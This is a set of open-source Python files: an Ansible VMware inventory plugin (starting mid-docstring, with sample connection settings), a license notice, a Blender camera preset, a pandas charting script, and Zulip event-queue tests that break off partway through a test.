hostname: 10.65.223.31
username: administrator@vsphere.local
password: Esxi@123$%
validate_certs: False
with_tags: True
'''
import ssl
import atexit
from ansible.errors import AnsibleError, AnsibleParserError
try:
# requests is required for exception handling of the ConnectionError
import requests
HAS_REQUESTS = True
except ImportError:
HAS_REQUESTS = False
try:
from pyVim import connect
from pyVmomi import vim, vmodl
HAS_PYVMOMI = True
except ImportError:
HAS_PYVMOMI = False
try:
from vmware.vapi.lib.connect import get_requests_connector
from vmware.vapi.security.session import create_session_security_context
from vmware.vapi.security.user_password import create_user_password_security_context
from com.vmware.cis_client import Session
from com.vmware.vapi.std_client import DynamicID
from com.vmware.cis.tagging_client import Tag, TagAssociation
HAS_VCLOUD = True
except ImportError:
HAS_VCLOUD = False
try:
from vmware.vapi.stdlib.client.factories import StubConfigurationFactory
HAS_VSPHERE = True
except ImportError:
HAS_VSPHERE = False
from ansible.plugins.inventory import BaseInventoryPlugin, Cacheable
class BaseVMwareInventory:
def __init__(self, hostname, username, password, port, validate_certs, with_tags):
self.hostname = hostname
self.username = username
self.password = password
self.port = port
self.with_tags = with_tags
self.validate_certs = validate_certs
self.content = None
self.rest_content = None
def do_login(self):
"""
Check requirements and do login
"""
self.check_requirements()
self.content = self._login()
if self.with_tags:
self.rest_content = self._login_vapi()
def _login_vapi(self):
"""
Login to vCenter API using REST call
Returns: connection object
"""
session = requests.Session()
session.verify = self.validate_certs
if not self.validate_certs:
# Disable warning shown at stdout
requests.packages.urllib3.disable_warnings()
vcenter_url = "https://%s/api" % self.hostname
# Get request connector
connector = get_requests_connector(session=session, url=vcenter_url)
# Create standard Configuration
stub_config = StubConfigurationFactory.new_std_configuration(connector)
# Use username and password in the security context to authenticate
security_context = create_user_password_security_context(self.username, self.password)
# Login
stub_config.connector.set_security_context(security_context)
# Create the stub for the session service and login by creating a session.
session_svc = Session(stub_config)
session_id = session_svc.create()
# After successful authentication, store the session identifier in the security
# context of the stub and use that for all subsequent remote requests
session_security_context = create_session_security_context(session_id)
stub_config.connector.set_security_context(session_security_context)
if stub_config is None:
raise AnsibleError("Failed to login to %s using %s" % (self.hostname, self.username))
return stub_config
def _login(self):
"""
Login to vCenter or ESXi server
Returns: connection object
"""
if self.validate_certs and not hasattr(ssl, 'SSLContext'):
raise AnsibleError('pyVim does not support changing verification mode with python < 2.7.9. Either update '
'python or set validate_certs to false in configuration YAML file.')
ssl_context = None
if not self.validate_certs and hasattr(ssl, 'SSLContext'):
ssl_context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
ssl_context.verify_mode = ssl.CERT_NONE
service_instance = None
try:
service_instance = connect.SmartConnect(host=self.hostname, user=self.username,
pwd=self.password, sslContext=ssl_context,
port=self.port)
except vim.fault.InvalidLogin as e:
raise AnsibleParserError("Unable to log on to vCenter or ESXi API at %s:%s as %s: %s" % (self.hostname, self.port, self.username, e.msg))
except vim.fault.NoPermission as e:
raise AnsibleParserError("User %s does not have required permission"
" to log on to vCenter or ESXi API at %s:%s : %s" % (self.username, self.hostname, self.port, e.msg))
except (requests.ConnectionError, ssl.SSLError) as e:
raise AnsibleParserError("Unable to connect to vCenter or ESXi API at %s on TCP/%s: %s" % (self.hostname, self.port, e))
except vmodl.fault.InvalidRequest as e:
# Request is malformed
raise AnsibleParserError("Failed to get a response from server %s:%s as "
"request is malformed: %s" % (self.hostname, self.port, e.msg))
except Exception as e:
raise AnsibleParserError("Unknown error while connecting to vCenter or ESXi API at %s:%s : %s" % (self.hostname, self.port, e))
if service_instance is None:
raise AnsibleParserError("Unknown error while connecting to vCenter or ESXi API at %s:%s" % (self.hostname, self.port))
atexit.register(connect.Disconnect, service_instance)
return service_instance.RetrieveContent()
def check_requirements(self):
""" Check all requirements for this inventory are satisified"""
if not HAS_REQUESTS:
raise AnsibleParserError('Please install "requests" Python module as this is required'
' for VMware Guest dynamic inventory plugin.')
elif not HAS_PYVMOMI:
raise AnsibleParserError('Please install "PyVmomi" Python module as this is required'
' for VMware Guest dynamic inventory plugin.')
if HAS_REQUESTS:
# Pyvmomi 5.5 and onwards requires requests 2.3
# https://github.com/vmware/pyvmomi/blob/master/requirements.txt
required_version = (2, 3)
requests_version = requests.__version__.split(".")[:2]
try:
requests_major_minor = tuple(map(int, requests_version))
except ValueError:
raise AnsibleParserError("Failed to parse 'requests' library version.")
if requests_major_minor < required_version:
raise AnsibleParserError("'requests' library version should"
" be >= %s, found: %s." % (".".join([str(w) for w in required_version]),
requests.__version__))
if not HAS_VSPHERE and self.with_tags:
raise AnsibleError("Unable to find 'vSphere Automation SDK' Python library which is required."
" Please refer this URL for installation steps"
" - https://code.vmware.com/web/sdk/65/vsphere-automation-python")
if not HAS_VCLOUD and self.with_tags:
raise AnsibleError("Unable to find 'vCloud Suite SDK' Python library which is required."
" Please refer this URL for installation steps"
" - https://code.vmware.com/web/sdk/60/vcloudsuite-python")
if not all([self.hostname, self.username, self.password]):
raise AnsibleError("Missing one of the following : hostname, username, password. Please read "
"the documentation for more information.")
def _get_managed_objects_properties(self, vim_type, properties=None):
"""
Look up a Managed Object Reference in vCenter / ESXi Environment
:param vim_type: Type of vim object e.g, for datacenter - vim.Datacenter
:param properties: List of properties related to vim object e.g. Name
:return: local content object
"""
# Get Root Folder
root_folder = self.content.rootFolder
if properties is None:
properties = ['name']
# Create Container View with default root folder
mor = self.content.viewManager.CreateContainerView(root_folder, [vim_type], True)
# Create Traversal spec
traversal_spec = vmodl.query.PropertyCollector.TraversalSpec(
name="traversal_spec",
path='view',
skip=False,
type=vim.view.ContainerView
)
# Create Property Spec
property_spec = vmodl.query.PropertyCollector.PropertySpec(
type=vim_type, # Type of object to retrieved
all=False,
pathSet=properties
)
# Create Object Spec
object_spec = vmodl.query.PropertyCollector.ObjectSpec(
obj=mor,
skip=True,
selectSet=[traversal_spec]
)
# Create Filter Spec
filter_spec = vmodl.query.PropertyCollector.FilterSpec(
objectSet=[object_spec],
propSet=[property_spec],
reportMissingObjectsInResults=False
)
return self.content.propertyCollector.RetrieveContents([filter_spec])
@staticmethod
def _get_object_prop(vm, attributes):
"""Safely get a property or return None"""
result = vm
for attribute in attributes:
try:
result = getattr(result, attribute)
except (AttributeError, IndexError):
return None
return result
class InventoryModule(BaseInventoryPlugin, Cacheable):
NAME = 'vmware_vm_inventory'
def verify_file(self, path):
"""
Verify plugin configuration file and mark this plugin active
Args:
path: Path of configuration YAML file
Returns: True if everything is correct, else False
"""
valid = False
if super(InventoryModule, self).verify_file(path):
if path.endswith(('vmware.yaml', 'vmware.yml')):
valid = True
return valid
def parse(self, inventory, loader, path, cache=True):
"""
Parses the inventory file
"""
super(InventoryModule, self).parse(inventory, loader, path, cache=cache)
cache_key = self.get_cache_key(path)
config_data = self._read_config_data(path)
# set _options from config data
self._consume_options(config_data)
self.pyv = BaseVMwareInventory(
hostname=self.get_option('hostname'),
username=self.get_option('username'),
password=self.get_option('password'),
port=self.get_option('port'),
with_tags=self.get_option('with_tags'),
validate_certs=self.get_option('validate_certs')
)
self.pyv.do_login()
self.pyv.check_requirements()
source_data = None
if cache:
cache = self.get_option('cache')
update_cache = False
if cache:
try:
source_data = self._cache[cache_key]
except KeyError:
update_cache = True
using_current_cache = cache and not update_cache
cacheable_results = self._populate_from_source(source_data, using_current_cache)
if update_cache:
self._cache[cache_key] = cacheable_results
def _populate_from_cache(self, source_data):
""" Populate cache using source data """
hostvars = source_data.pop('_meta', {}).get('hostvars', {})
for group in source_data:
if group == 'all':
continue
else:
self.inventory.add_group(group)
hosts = source_data[group].get('hosts', [])
for host in hosts:
self._populate_host_vars([host], hostvars.get(host, {}), group)
self.inventory.add_child('all', group)
def _populate_from_source(self, source_data, using_current_cache):
"""
Populate inventory data from direct source
"""
if using_current_cache:
self._populate_from_cache(source_data)
return source_data
cacheable_results = {'_meta': {'hostvars': {}}}
hostvars = {}
objects = self.pyv._get_managed_objects_properties(vim_type=vim.VirtualMachine,
properties=['name'])
if self.pyv.with_tags:
tag_svc = Tag(self.pyv.rest_content)
tag_association = TagAssociation(self.pyv.rest_content)
tags_info = dict()
tags = tag_svc.list()
for tag in tags:
tag_obj = tag_svc.get(tag)
tags_info[tag_obj.id] = tag_obj.name
if tag_obj.name not in cacheable_results:
cacheable_results[tag_obj.name] = {'hosts': []}
self.inventory.add_group(tag_obj.name)
for vm_obj in objects:
for vm_obj_property in vm_obj.propSet:
# VMware does not provide a way to uniquely identify VM by its name
# i.e. there can be two virtual machines with same name
# Appending "_" and VMware UUID to make it unique
current_host = vm_obj_property.val + "_" + vm_obj.obj.config.uuid
if current_host not in hostvars:
hostvars[current_host] = {}
self.inventory.add_host(current_host)
host_ip = vm_obj.obj.guest.ipAddress
if host_ip:
self.inventory.set_variable(current_host, 'ansible_host', host_ip)
self._populate_host_properties(vm_obj, current_host)
# Only gather facts related to tag if vCloud and vSphere is installed.
if HAS_VCLOUD and HAS_VSPHERE and self.pyv.with_tags:
# Add virtual machine to appropriate tag group
vm_mo_id = vm_obj.obj._GetMoId()
vm_dynamic_id = DynamicID(type='VirtualMachine', id=vm_mo_id)
attached_tags = tag_association.list_attached_tags(vm_dynamic_id)
for tag_id in attached_tags:
self.inventory.add_child(tags_info[tag_id], current_host)
cacheable_results[tags_info[tag_id]]['hosts'].append(current_host)
# Based on power state of virtual machine
vm_power = str(vm_obj.obj.summary.runtime.powerState)
if vm_power not in cacheable_results:
cacheable_results[vm_power] = {'hosts': []}
self.inventory.add_group(vm_power)
cacheable_results[vm_power]['hosts'].append(current_host)
self.inventory.add_child(vm_power, current_host)
# Based on guest id
vm_guest_id = vm_obj.obj.config.guestId
if vm_guest_id and vm_guest_id not in cacheable_results:
cacheable_results[vm_guest_id] = {'hosts': []}
self.inventory.add_group(vm_guest_id)
cacheable_results[vm_guest_id]['hosts'].append(current_host)
self.inventory.add_child(vm_guest_id, current_host)
for host in hostvars:
h = self.inventory.get_host(host)
cacheable_results['_meta']['hostvars'][h.name] = h.vars
return cacheable_results
def _populate_host_properties(self, vm_obj, current_host):
# Load VM properties in host_vars
vm_properties = [
'name',
'config.cpuHotAddEnabled',
'config.cpuHotRemoveEnabled',
'config.instanceUuid',
'config.hardware.numCPU',
'config.template',
'config.name',
'guest.hostName',
'guest.ipAddress',
'guest.guestId',
'guest.guestState',
'runtime.maxMemoryUsage',
'customValue',
]
field_mgr = self.pyv.content.customFieldsManager.field
for vm_prop in vm_properties:
if vm_prop == 'customValue':
for cust_value in vm_obj.obj.customValue:
self.inventory.set_variable(current_host,
[y.name for y in field_mgr if y.key == cust_value.key][0],
cust_value.value)
else:
vm_value = self.pyv._get_object_prop(vm_obj.obj, vm_prop.split("."))
self.inventory.set_variable(current_host, vm_prop, vm_value)
| helldorado/ansible | lib/ansible/plugins/inventory/vmware_vm_inventory.py | Python | gpl-3.0 | 19,672 |
# -*- coding: utf-8 -*-
"""Assessment Open Service Interface Definitions
assessment version 3.0.0
Copyright (c) 2002-2004 Massachusetts Institute of Technology.
Copyright (c) 2008-2010 Ingenescus. All Rights Reserved.
This Work is being provided by the copyright holder(s) subject to the
following license. By obtaining, using and/or copying this Work, you
agree that you have read, understand, and will comply with the following
terms and conditions.
Permission to use, copy and distribute unmodified versions of this Work,
for any purpose, without fee or royalty is hereby granted, provided that
you include the above copyright notices and the terms of this license on
ALL copies of the Work or portions thereof.
You may nodify or create Derivatives of this Work only for your internal
purposes. You shall not distribute or transfer any such Derivative of
this Work to any location or to any third party. For the purposes of
this license, "Derivative" shall mean any derivative of the Work as
defined in the United States Copyright Act of 1976, such as a
translation or modification.
This Work and the information contained herein is provided on an "AS IS"
basis WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT
NOT LIMITED TO WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN
AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
CONNECTION WITH THE WORK OR THE USE OR OTHER DEALINGS IN THE WORK.
The export of software employing encryption technology may require a
specific license from the United States Government. It is the
responsibility of any person or organization contemplating export to
obtain such a license before exporting this Work.
"""
| birdland/dlkit-doc | dlkit/assessment/license.py | Python | mit | 1,842 |
import bpy
camera = bpy.context.edit_movieclip.tracking.camera
camera.sensor_width = 15.81
camera.units = 'MILLIMETERS'
camera.pixel_aspect = 1
camera.k1 = 0.0
camera.k2 = 0.0
camera.k3 = 0.0
| Microvellum/Fluid-Designer | win64-vc/2.78/scripts/presets/tracking_camera/Blackmagic_Cinema_Camera.py | Python | gpl-3.0 | 193 |
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 26 16:43:46 2017
@author: DWyatt
"""
import pandas as pd
import seaborn as sns
import os
import matplotlib.pyplot as plt
df_train = pd.read_csv('train.csv')
target = 'SalePrice'
variables = [str(column) for column in df_train.columns if column!=target]
dir1 = os.getcwd()
for variable in variables:
plt.figure()
sns_scatter= sns.stripplot(x=variable, y=target, data=df_train)
fig = sns_scatter.get_figure()
fig.savefig(dir1 + '\\charts\\' + variable + '.png')
del sns_scatter
del fig
#del df_train
#sys.exit()
#sns_pair = sns.pairplot(df_train,
#x_vars=['SalePrice'],
#y_vars=['LotFrontage', 'Neighborhood']) | BenChehade/datasciences | chart - sales price vs variables/generate_charts.py | Python | mit | 724 |
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from typing import Any, Callable, Optional
from django.conf import settings
from django.http import HttpRequest, HttpResponse
from django.test import TestCase
from zerver.models import (
get_client, get_realm_by_string_id, get_stream, get_user_profile_by_email,
Message, Recipient, UserProfile
)
from zerver.lib.actions import (
apply_events,
bulk_remove_subscriptions,
do_add_alert_words,
check_add_realm_emoji,
do_add_realm_filter,
do_change_avatar_source,
do_change_default_all_public_streams,
do_change_default_events_register_stream,
do_change_default_sending_stream,
do_change_full_name,
do_change_is_admin,
do_change_stream_description,
do_change_subscription_property,
do_create_user,
do_deactivate_stream,
do_deactivate_user,
do_regenerate_api_key,
do_remove_alert_words,
do_remove_realm_emoji,
do_remove_realm_filter,
do_rename_stream,
do_add_default_stream,
do_set_muted_topics,
do_set_realm_create_stream_by_admins_only,
do_set_realm_name,
do_set_realm_restricted_to_domain,
do_set_realm_invite_required,
do_set_realm_invite_by_admins_only,
do_set_realm_message_editing,
do_set_realm_default_language,
do_set_realm_authentication_methods,
do_update_message,
do_update_pointer,
do_change_twenty_four_hour_time,
do_change_left_side_userlist,
fetch_initial_state_data,
get_subscription
)
from zerver.lib.message import render_markdown
from zerver.lib.test_helpers import POSTRequestMock
from zerver.lib.test_classes import (
ZulipTestCase,
)
from zerver.lib.validator import (
check_bool, check_dict, check_int, check_list, check_string,
equals, check_none_or, Validator
)
from zerver.views.events_register import _default_all_public_streams, _default_narrow
from zerver.tornado.event_queue import allocate_client_descriptor, EventQueue
from zerver.tornado.views import get_events_backend
from collections import OrderedDict
import mock
import time
import ujson
from six.moves import range
class TornadoTest(ZulipTestCase):
def test_tornado_endpoint(self):
# type: () -> None
# This test is mostly intended to get minimal coverage on
# the /notify_tornado endpoint, so we can have 100% URL coverage,
# but it does exercise a little bit of the codepath.
post_data = dict(
data=ujson.dumps(
dict(
event=dict(
type='other'
),
users=[get_user_profile_by_email('hamlet@zulip.com').id],
),
),
)
req = POSTRequestMock(post_data, user_profile=None)
req.META['REMOTE_ADDR'] = '127.0.0.1'
result = self.client_post_request('/notify_tornado', req)
self.assert_json_error(result, 'Access denied', status_code=403)
post_data['secret'] = settings.SHARED_SECRET
req = POSTRequestMock(post_data, user_profile=None)
req.META['REMOTE_ADDR'] = '127.0.0.1'
result = self.client_post_request('/notify_tornado', req)
self.assert_json_success(result)
class GetEventsTest(ZulipTestCase):
def tornado_call(self, view_func, user_profile, post_data):
# type: (Callable[[HttpRequest, UserProfile], HttpResponse], UserProfile, Dict[str, Any]) -> HttpResponse
request = POSTRequestMock(post_data, user_profile)
return view_func(request, user_profile)
def test_get_events(self):
# type: () -> None
email = "hamlet@zulip.com"
recipient_email = "othello@zulip.com"
user_profile = get_user_profile_by_email(email)
recipient_user_profile = get_user_profile_by_email(recipient_email)
self.login(email)
result = self.tornado_call(get_events_backend, user_profile,
{"apply_markdown": ujson.dumps(True),
"event_types": ujson.dumps(["message"]),
"user_client": "website",
"dont_block": ujson.dumps(True),
})
self.assert_json_success(result)
queue_id = ujson.loads(result.content)["queue_id"]
recipient_result = self.tornado_call(get_events_backend, recipient_user_profile,
{"apply_markdown": ujson.dumps(True),
"event_types": ujson.dumps(["message"]),
"user_client": "website",
"dont_block": ujson.dumps(True),
})
self.assert_json_success(recipient_result)
recipient_queue_id = ujson.loads(recipient_result.content)["queue_id"]
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 0)
local_id = 10.01
self.send_message(email, recipient_email, Recipient.PERSONAL, "hello", local_id=local_id, sender_queue_id=queue_id)
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 1)
self.assertEqual(events[0]["type"], "message")
self.assertEqual(events[0]["message"]["sender_email"], email)
self.assertEqual(events[0]["local_message_id"], local_id)
self.assertEqual(events[0]["message"]["display_recipient"][0]["is_mirror_dummy"], False)
self.assertEqual(events[0]["message"]["display_recipient"][1]["is_mirror_dummy"], False)
last_event_id = events[0]["id"]
local_id += 0.01
self.send_message(email, recipient_email, Recipient.PERSONAL, "hello", local_id=local_id, sender_queue_id=queue_id)
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": last_event_id,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 1)
self.assertEqual(events[0]["type"], "message")
self.assertEqual(events[0]["message"]["sender_email"], email)
self.assertEqual(events[0]["local_message_id"], local_id)
# Test that the received message in the receiver's event queue
# exists and does not contain a local id
recipient_result = self.tornado_call(get_events_backend, recipient_user_profile,
{"queue_id": recipient_queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
recipient_events = ujson.loads(recipient_result.content)["events"]
self.assert_json_success(recipient_result)
self.assertEqual(len(recipient_events), 2)
self.assertEqual(recipient_events[0]["type"], "message")
self.assertEqual(recipient_events[0]["message"]["sender_email"], email)
self.assertTrue("local_message_id" not in recipient_events[0])
self.assertEqual(recipient_events[1]["type"], "message")
self.assertEqual(recipient_events[1]["message"]["sender_email"], email)
self.assertTrue("local_message_id" not in recipient_events[1])
def test_get_events_narrow(self):
# type: () -> None
email = "hamlet@zulip.com"
user_profile = get_user_profile_by_email(email)
self.login(email)
result = self.tornado_call(get_events_backend, user_profile,
{"apply_markdown": ujson.dumps(True),
"event_types": ujson.dumps(["message"]),
"narrow": ujson.dumps([["stream", "denmark"]]),
"user_client": "website",
"dont_block": ujson.dumps(True),
})
self.assert_json_success(result)
queue_id = ujson.loads(result.content)["queue_id"]
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 0)
self.send_message(email, "othello@zulip.com", Recipient.PERSONAL, "hello")
self.send_message(email, "Denmark", Recipient.STREAM, "hello")
result = self.tornado_call(get_events_backend, user_profile,
{"queue_id": queue_id,
"user_client": "website",
"last_event_id": -1,
"dont_block": ujson.dumps(True),
})
events = ujson.loads(result.content)["events"]
self.assert_json_success(result)
self.assert_length(events, 1)
self.assertEqual(events[0]["type"], "message")
self.assertEqual(events[0]["message"]["display_recipient"], "Denmark")
class EventsRegisterTest(ZulipTestCase):
user_profile = get_user_profile_by_email("hamlet@zulip.com")
bot = get_user_profile_by_email("welcome-bot@zulip.com")
maxDiff = None # type: Optional[int]
def create_bot(self, email):
# type: (str) -> UserProfile
return do_create_user(email, '123',
get_realm_by_string_id('zulip'), 'Test Bot', 'test',
bot_type=UserProfile.DEFAULT_BOT, bot_owner=self.user_profile)
def realm_bot_schema(self, field_name, check):
# type: (str, Validator) -> Validator
return check_dict([
('type', equals('realm_bot')),
('op', equals('update')),
('bot', check_dict([
('email', check_string),
('user_id', check_int),
(field_name, check),
])),
])
def do_test(self, action, event_types=None):
# type: (Callable[[], Any], Optional[List[str]]) -> List[Dict[str, Any]]
client = allocate_client_descriptor(
dict(user_profile_id = self.user_profile.id,
user_profile_email = self.user_profile.email,
realm_id = self.user_profile.realm.id,
event_types = event_types,
client_type_name = "website",
apply_markdown = True,
all_public_streams = False,
queue_timeout = 600,
last_connection_time = time.time(),
narrow = [])
)
# hybrid_state = initial fetch state + re-applying events triggered by our action
# normal_state = do action then fetch at the end (the "normal" code path)
hybrid_state = fetch_initial_state_data(self.user_profile, event_types, "")
action()
events = client.event_queue.contents()
self.assertTrue(len(events) > 0)
apply_events(hybrid_state, events, self.user_profile)
normal_state = fetch_initial_state_data(self.user_profile, event_types, "")
self.match_states(hybrid_state, normal_state)
return events
def assert_on_error(self, error):
# type: (str) -> None
if error:
raise AssertionError(error)
def match_states(self, state1, state2):
# type: (Dict[str, Any], Dict[str, Any]) -> None
def normalize(state):
# type: (Dict[str, Any]) -> None
state['realm_users'] = {u['email']: u for u in state['realm_users']}
for u in state['subscriptions']:
u['subscribers'].sort()
state['subscriptions'] = {u['name']: u for u in state['subscriptions']}
state['unsubscribed'] = {u['name']: u for u in state['unsubscribed']}
if 'realm_bots' in state:
state['realm_bots'] = {u['email']: u for u in state['realm_bots']}
normalize(state1)
normalize(state2)
self.assertEqual(state1, state2)
def test_send_message_events(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('message')),
('flags', check_list(None)),
('message', check_dict([
('avatar_url', check_string),
('client', check_string),
('content', check_string),
('content_type', equals('text/html')),
('display_recipient', check_string),
('gravatar_hash', check_string),
('id', check_int),
('recipient_id', check_int),
('sender_domain', check_string),
('sender_email', check_string),
('sender_full_name', check_string),
('sender_id', check_int),
('sender_short_name', check_string),
('subject', check_string),
('subject_links', check_list(None)),
('timestamp', check_int),
('type', check_string),
])),
])
events = self.do_test(lambda: self.send_message("hamlet@zulip.com", "Verona", Recipient.STREAM, "hello"))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
schema_checker = check_dict([
('type', equals('update_message')),
('flags', check_list(None)),
('content', check_string),
('edit_timestamp', check_int),
('flags', check_list(None)),
('message_id', check_int),
('message_ids', check_list(check_int)),
('orig_content', check_string),
('orig_rendered_content', check_string),
('orig_subject', check_string),
('propagate_mode', check_string),
('rendered_content', check_string),
('sender', check_string),
('stream_id', check_int),
('subject', check_string),
('subject_links', check_list(None)),
# There is also a timestamp field in the event, but we ignore it, as
# it's kind of an unwanted but harmless side effect of calling log_event.
])
message = Message.objects.order_by('-id')[0]
topic = 'new_topic'
propagate_mode = 'change_all'
content = 'new content'
rendered_content = render_markdown(message, content)
events = self.do_test(lambda: do_update_message(self.user_profile, message, topic, propagate_mode, content, rendered_content))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_pointer_events(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('pointer')),
('pointer', check_int)
])
events = self.do_test(lambda: do_update_pointer(self.user_profile, 1500))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_register_events(self):
# type: () -> None
realm_user_add_checker = check_dict([
('type', equals('realm_user')),
('op', equals('add')),
('person', check_dict([
('email', check_string),
('full_name', check_string),
('is_admin', check_bool),
('is_bot', check_bool),
])),
])
stream_create_checker = check_dict([
('type', equals('stream')),
('op', equals('create')),
('streams', check_list(check_dict([
('description', check_string),
('invite_only', check_bool),
('name', check_string),
('stream_id', check_int),
])))
])
events = self.do_test(lambda: self.register("test1", "test1"))
error = realm_user_add_checker('events[0]', events[0])
self.assert_on_error(error)
error = stream_create_checker('events[1]', events[1])
self.assert_on_error(error)
def test_alert_words_events(self):
# type: () -> None
alert_words_checker = check_dict([
('type', equals('alert_words')),
('alert_words', check_list(check_string)),
])
events = self.do_test(lambda: do_add_alert_words(self.user_profile, ["alert_word"]))
error = alert_words_checker('events[0]', events[0])
self.assert_on_error(error)
events = self.do_test(lambda: do_remove_alert_words(self.user_profile, ["alert_word"]))
error = alert_words_checker('events[0]', events[0])
self.assert_on_error(error)
def test_default_streams_events(self):
# type: () -> None
default_streams_checker = check_dict([
('type', equals('default_streams')),
('default_streams', check_list(check_dict([
('description', check_string),
('invite_only', check_bool),
('name', check_string),
('stream_id', check_int),
]))),
])
events = self.do_test(lambda: do_add_default_stream(self.user_profile.realm, "Scotland"))
error = default_streams_checker('events[0]', events[0])
self.assert_on_error(error)
def test_muted_topics_events(self):
# type: () -> None
muted_topics_checker = check_dict([
('type', equals('muted_topics')),
('muted_topics', check_list(check_list(check_string, 2))),
])
events = self.do_test(lambda: do_set_muted_topics(self.user_profile, [[u"Denmark", u"topic"]]))
error = muted_topics_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_full_name(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm_user')),
('op', equals('update')),
('person', check_dict([
('email', check_string),
('full_name', check_string),
])),
])
events = self.do_test(lambda: do_change_full_name(self.user_profile, 'Sir Hamlet'))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_name(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('name')),
('value', check_string),
])
events = self.do_test(lambda: do_set_realm_name(self.user_profile.realm, 'New Realm Name'))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_restricted_to_domain(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('restricted_to_domain')),
('value', check_bool),
])
# The first True is probably a noop, then we get transitions in both directions.
for restricted_to_domain in (True, False, True):
events = self.do_test(lambda: do_set_realm_restricted_to_domain(self.user_profile.realm, restricted_to_domain))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_invite_required(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('invite_required')),
('value', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for invite_required in (False, True, False):
events = self.do_test(lambda: do_set_realm_invite_required(self.user_profile.realm, invite_required))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_authentication_methods(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update_dict')),
('property', equals('default')),
('data', check_dict([])),
])
# Test transitions; any new backends should be tested with T/T/T/F/T
for (auth_method_dict) in \
({'Google': True, 'Email': True, 'GitHub': True, 'LDAP': False, 'Dev': False},
{'Google': True, 'Email': True, 'GitHub': False, 'LDAP': False, 'Dev': False},
{'Google': True, 'Email': False, 'GitHub': False, 'LDAP': False, 'Dev': False},
{'Google': True, 'Email': False, 'GitHub': True, 'LDAP': False, 'Dev': False },
{'Google': False, 'Email': False, 'GitHub': False, 'LDAP': False, 'Dev': True},
{'Google': False, 'Email': False, 'GitHub': True, 'LDAP': False, 'Dev': True},
{'Google': False, 'Email': True, 'GitHub': True, 'LDAP': True, 'Dev': False}):
events = self.do_test(lambda: do_set_realm_authentication_methods(self.user_profile.realm,
auth_method_dict))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_invite_by_admins_only(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('invite_by_admins_only')),
('value', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for invite_by_admins_only in (False, True, False):
events = self.do_test(lambda: do_set_realm_invite_by_admins_only(self.user_profile.realm, invite_by_admins_only))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_default_language(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('default_language')),
('value', check_string),
])
events = self.do_test(lambda: do_set_realm_default_language(self.user_profile.realm, 'de'))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_create_stream_by_admins_only(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update')),
('property', equals('create_stream_by_admins_only')),
('value', check_bool),
])
# The first False is probably a noop, then we get transitions in both directions.
for create_stream_by_admins_only in (False, True, False):
events = self.do_test(lambda: do_set_realm_create_stream_by_admins_only(self.user_profile.realm,
create_stream_by_admins_only))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_pin_stream(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('subscription')),
('op', equals('update')),
('property', equals('pin_to_top')),
('value', check_bool),
])
stream = "Denmark"
sub = get_subscription(stream, self.user_profile)
# The first False is probably a noop, then we get transitions in both directions.
for pinned in (False, True, False):
events = self.do_test(lambda: do_change_subscription_property(self.user_profile, sub, stream, "pin_to_top", pinned))
error = schema_checker('events[0]', events[0])
self.assert_on_error(error)
def test_change_realm_message_edit_settings(self):
# type: () -> None
schema_checker = check_dict([
('type', equals('realm')),
('op', equals('update_dict')),
('property', equals('default')),
('data', check_dict([('allow_message_editing', check_bool),
('message_content_edit_limit_seconds', check_int)])),
])
# Test every transition among the four possibilities {T,F} x {0, non-0}
for (allow_message_editing, message_content_edit_limit_seconds) in \
((True, 0), (False, 0), (True, 0), (False, 1234), (True, 0), (True, 1234), (True, 0),
